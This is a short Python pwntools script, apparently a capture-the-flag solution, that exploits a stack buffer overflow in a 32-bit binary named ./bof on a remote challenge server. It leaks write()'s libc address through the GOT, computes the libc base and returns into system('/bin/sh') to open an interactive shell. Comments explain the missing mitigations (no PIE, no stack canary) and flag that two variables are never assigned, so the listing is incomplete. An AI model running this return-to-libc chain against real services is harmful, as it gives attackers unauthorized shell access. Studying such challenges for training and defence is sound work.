from pwn import *

# Two-stage return-to-libc solution for the 32-bit challenge binary ./bof.
# Stage 1 makes the program print the resolved address of write() so the libc
# load address can be computed; stage 2 returns into system("/bin/sh").
#
# NOTE(review): `offset` and `main_addr` are used below but never assigned in
# this listing. They have to come from the author's analysis of the binary
# (presumably the distance to the saved frame pointer and the address of
# main) -- confirm against the rest of the write-up.
#
# Why this works, read defensively: the PLT/GOT addresses are taken from the
# ELF with no base adjustment, which only holds for a non-PIE binary, and the
# saved return address is overwritten directly, which presumably means the
# vulnerable function carries no stack canary. A PIE build invalidates the
# fixed addresses; a stack protector catches the overwrite before the return.

io = remote('node3.buuoj.cn', 29610)
elf = ELF('./bof')
libc = ELF('../libc-2.23_32.so')

# Drain whatever the service sends first; the data itself is not used.
io.recv()

# Filler length: `offset` plus 4 more bytes (presumably the saved EBP).
pad_len = offset + 4

# Stage 1: write(1, &GOT[write], 4), then return to main for a second input.
write_plt = elf.plt['write']
write_got = elf.got['write']
leak_chain = [
    p8(0) * pad_len,
    p32(write_plt),   # overwritten return address -> write@plt
    p32(main_addr),   # where write() returns to
    p32(1),           # fd argument
    p32(write_got),   # buf argument: the GOT slot holding write's address
    p32(4),           # count argument
]
io.sendline(b''.join(leak_chain))

# The leak is located by its top byte: the script relies on 32-bit libc
# mappings ending in 0xf7 and takes the four bytes up to and including it.
leaked = io.recvuntil('\xf7')
write_addr = u32(leaked[-4:])
libc_base = write_addr - libc.symbols['write']

system_addr = libc_base + libc.symbols['system']
bin_sh = libc_base + next(libc.search(b'/bin/sh'))

# A page-aligned libc_base is a quick sanity check that the leak parsed well.
for value in (libc_base, bin_sh, system_addr):
    print(hex(value))

# Stage 2: same overflow again; b'dead' is a dummy return address for
# system(), followed by its single argument.
shell_chain = b'p' * pad_len + p32(system_addr) + b'dead' + p32(bin_sh)
io.sendline(shell_chain)

io.interactive()